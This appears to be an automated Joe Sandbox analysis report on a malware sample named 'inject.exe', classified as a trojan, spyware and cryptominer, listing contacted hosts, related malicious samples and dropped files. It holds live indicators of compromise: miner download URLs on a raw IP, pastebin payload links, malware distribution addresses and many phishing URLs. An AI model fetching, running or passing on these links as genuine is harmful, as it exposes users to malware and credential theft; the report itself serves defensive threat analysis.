                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2002/12/policyRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://api.ip.sbRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://tempuri.org/Entity/Id22ResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://147.45.47.81/lolMiner.exeRegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/IssueRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://147.45.47.81/xmrig.exeRegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/scRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://tempuri.org/Entity/Id18ResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://tempuri.org/Entity/Id3ResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rmRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                104.20.3.235
                                                                                                                                                                                                pastebin.comUnited States
                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                185.215.113.22
                                                                                                                                                                                                unknownPortugal
                                                                                                                                                                                                206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                188.114.97.3
                                                                                                                                                                                                joxi.netEuropean Union
                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                147.45.47.81
                                                                                                                                                                                                unknownRussian Federation
                                                                                                                                                                                                2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                Analysis ID:1522107
                                                                                                                                                                                                Start date and time:2024-09-29 09:43:07 +02:00
                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                Overall analysis duration:0h 9m 6s
                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                Number of analysed new started processes analysed:34
                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                Sample name:inject.exe
                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.mine.winEXE@56/47@3/4
                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                                                                • Number of executed functions: 255
                                                                                                                                                                                                • Number of non-executed functions: 108
                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31
                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                • VT rate limit hit for: inject.exe
                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                03:44:09API Interceptor56x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                                03:44:20API Interceptor1x Sleep call for process: Installer.exe modified
                                                                                                                                                                                                03:44:22API Interceptor11x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                03:44:26API Interceptor1x Sleep call for process: RegSvcs.exe modified
                                                                                                                                                                                                09:44:25Task SchedulerRun new task: dllhost path: C:\ProgramData\Dllhost\dllhost.exe
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                104.20.3.235sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                                                                                                                • pastebin.com/raw/V9y5Q5vv
                                                                                                                                                                                                SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                                                                                                                                                • pastebin.com/raw/V9y5Q5vv
                                                                                                                                                                                                sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • pastebin.com/raw/V9y5Q5vv
                                                                                                                                                                                                New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                                • pastebin.com/raw/NsQ5qTHr
                                                                                                                                                                                                Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                                • pastebin.com/raw/NsQ5qTHr
                                                                                                                                                                                                2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                                • pastebin.com/raw/NsQ5qTHr
                                                                                                                                                                                                PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                                • pastebin.com/raw/NsQ5qTHr
                                                                                                                                                                                                185.215.113.22eX52te2rsl.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 185.215.113.22/E2vacMBpWA.php
                                                                                                                                                                                                Tm7nvymUzB.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 185.215.113.22/E2vacMBpWA.php
                                                                                                                                                                                                28KnqbCVcB.exeGet hashmaliciousRaccoon RedLine SmokeLoader VidarBrowse
                                                                                                                                                                                                • 185.215.113.22/456.exe
                                                                                                                                                                                                CbdcLsdlhu.exeGet hashmaliciousRaccoon SmokeLoader VidarBrowse
                                                                                                                                                                                                • 185.215.113.22/456.exe
                                                                                                                                                                                                v7LP0imI30.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                • 185.215.113.22/456.exe
                                                                                                                                                                                                YZTyglLign.exeGet hashmaliciousMicroClip Raccoon RedLine SmokeLoader VidarBrowse
                                                                                                                                                                                                • 185.215.113.22/456.exe
                                                                                                                                                                                                188.114.97.3http://meta.case-page-appeal.eu/community-standard/208273899187123/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                                                                                                                                                9q24V7OSys.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                • www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
                                                                                                                                                                                                QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                • filetransfer.io/data-package/mfctuvFf/download
                                                                                                                                                                                                http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • brawllstars.ru/
                                                                                                                                                                                                http://aktiivasi-paylaterr.from-resmi.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • aktiivasi-paylaterr.from-resmi.com/
                                                                                                                                                                                                ECChG5eWfZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                • homker11.uebki.one/GeneratorTest.php
                                                                                                                                                                                                HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                                                                                                                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                • filetransfer.io/data-package/Ky4pZ0WB/download
                                                                                                                                                                                                ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                • www.1win-moldovia.fun/1g7m/
                                                                                                                                                                                                http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • www.tiktok758.com/img/logo.4c830710.svg
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                pastebin.comq71n2VrEY3.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                • 172.67.19.24
                                                                                                                                                                                                lvHIHLt0b2.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                envifa.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 172.67.19.24
                                                                                                                                                                                                SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                • 104.20.4.235
                                                                                                                                                                                                AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                • 172.67.19.24
                                                                                                                                                                                                test.batGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                • 104.20.4.235
                                                                                                                                                                                                Oficio notificacion multas y sanciones.vbsGet hashmaliciousNjratBrowse
                                                                                                                                                                                                • 104.20.4.235
                                                                                                                                                                                                sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                bF9JDHS47l.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 172.67.19.24
                                                                                                                                                                                                joxi.netgHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                7aHn0kxDWZ.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                [V2]launcher.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                                                                • 104.21.73.118
                                                                                                                                                                                                Software_1.30.1.exeGet hashmaliciousLummaC, PureLog Stealer, XmrigBrowse
                                                                                                                                                                                                • 104.21.73.118
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.21.73.223
                                                                                                                                                                                                https://tny.im/JrUMp/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                https://dropbox439849243239272-272774326645823932930000327.pages.dev/098989898Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                https://62f18194-01d0-459e-a945-4bad417cd3e1-00-2qivtb2vbf734.worf.replit.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.18.35.46
                                                                                                                                                                                                https://c1b99480-8a61-4c60-bc2e-0c2721da2d22-00-17rux3rshyuau.kirk.replit.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.18.35.46
                                                                                                                                                                                                http://bankofamerica-secure-login.framer.ai/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.18.86.42
                                                                                                                                                                                                http://www.telegram-korea.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.21.80.160
                                                                                                                                                                                                http://microsoft.biosency.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                https://attofficialvalidation.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.18.11.213
                                                                                                                                                                                                FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                MW3 Phoenix Legacy.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                • 147.45.47.64
                                                                                                                                                                                                https://steamcommninty.com/gift/activation/id=5947221648Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 147.45.47.40
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                                                                                                                                                                • 147.45.60.44
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                                                                                                                                                                                • 147.45.60.44
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                setup.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                                                                • 193.233.132.253
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                • 147.45.44.104
                                                                                                                                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.21.73.223
                                                                                                                                                                                                https://tny.im/JrUMp/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                https://dropbox439849243239272-272774326645823932930000327.pages.dev/098989898Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                https://62f18194-01d0-459e-a945-4bad417cd3e1-00-2qivtb2vbf734.worf.replit.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.18.35.46
                                                                                                                                                                                                https://c1b99480-8a61-4c60-bc2e-0c2721da2d22-00-17rux3rshyuau.kirk.replit.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.18.35.46
                                                                                                                                                                                                http://bankofamerica-secure-login.framer.ai/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.18.86.42
                                                                                                                                                                                                http://www.telegram-korea.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.21.80.160
                                                                                                                                                                                                http://microsoft.biosency.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                https://attofficialvalidation.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.18.11.213
                                                                                                                                                                                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                • 185.215.113.37
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.37
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.37
                                                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                • 185.215.113.37
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.37
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.37
                                                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                • 185.215.113.37
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.37
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, StealcBrowse
                                                                                                                                                                                                • 185.215.113.103
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.37
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0ehttps://tny.im/JrUMp/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                https://c1b99480-8a61-4c60-bc2e-0c2721da2d22-00-17rux3rshyuau.kirk.replit.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                http://microsoft.biosency.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                http://geimuinislonggu.gitbook.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                https://mailsecurityref.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                https://logg_koonbase.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                https://coinnbaeeprologin.gitbook.io/usGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                https://phanom-wlie.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                https://pub-8808e94b1a5c49dbb2a2e0829ec1562b.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                https://basepro-login.gitbook.io/loginGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\7z.exegHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      7aHn0kxDWZ.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                        BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                                                                          CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                                                                            XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                                                                              vD4M7DL9MY.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                  lfjG1UlwP1.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\main\7z.dllgHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          7aHn0kxDWZ.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                            BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                                                                                              CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                                                                                                XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                                                                                                  vD4M7DL9MY.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                    n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                      lfjG1UlwP1.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):729
                                                                                                                                                                                                                                        Entropy (8bit):5.11212271596743
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:8G/y8vM/jwKdt//j/K3AEN6Qclfw/1127UwLnjDTwDMVFAi:8G/y8wj5djUNso/XUnLnjD0DMnAi
                                                                                                                                                                                                                                        MD5:ADE6854A8351E50758F93066F547C188
                                                                                                                                                                                                                                        SHA1:771278CB4FC00BDC54B95C2FE43C839F9D59FD6C
                                                                                                                                                                                                                                        SHA-256:FAA5DA36E19D42EA123A6765D50E6B27794DB08342850D1E36695332F8E47BC0
                                                                                                                                                                                                                                        SHA-512:3202F608789CAD4E8485B06344EACFE9AD48B197A4FAD94C9F15CAC07C7322BDB838F61F82955DA7C136952D61922E47E8CA4FB77CCBC7B47953D9943069C724
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview: [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->.. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->..<head>..<title>Suspected phishing site | Cloudflare</title>..<meta charset="UTF-8" />..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />..<meta http-equiv="X-UA-Compatible" content="IE=Edge" />..<meta name="robots" content="noindex, nofollow" />..<meta name="viewport" content="width=device-width,initial-scale=1" />..<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />.. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->..cp..https://pastebin.com/raw/dq3hWX27..
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:56 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2104
                                                                                                                                                                                                                                        Entropy (8bit):3.451533645956416
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8SYl2dfTXdARYrnvPdAKRkdAGdAKRFdAKRE:8SYlO7
                                                                                                                                                                                                                                        MD5:0D8FB55493065445F8D3B04A69EF6668
                                                                                                                                                                                                                                        SHA1:75CE897423226162720A6E40D5E60FFD5A7D130A
                                                                                                                                                                                                                                        SHA-256:5961BBF3754AED5E410DD5E5584D7F64A25F58BBCFE14597F2250AAE160F6FA3
                                                                                                                                                                                                                                        SHA-512:4A3C0374A039BF8D50BBD1A4A73DA9BED6E17235C2E65068D4C16B42EC69B85993CE07C3A861236555D45D6CFA42384A65FCB8819F235165C1252B93D86AD550
                                                                                                                                                                                                                                        Malicious:false
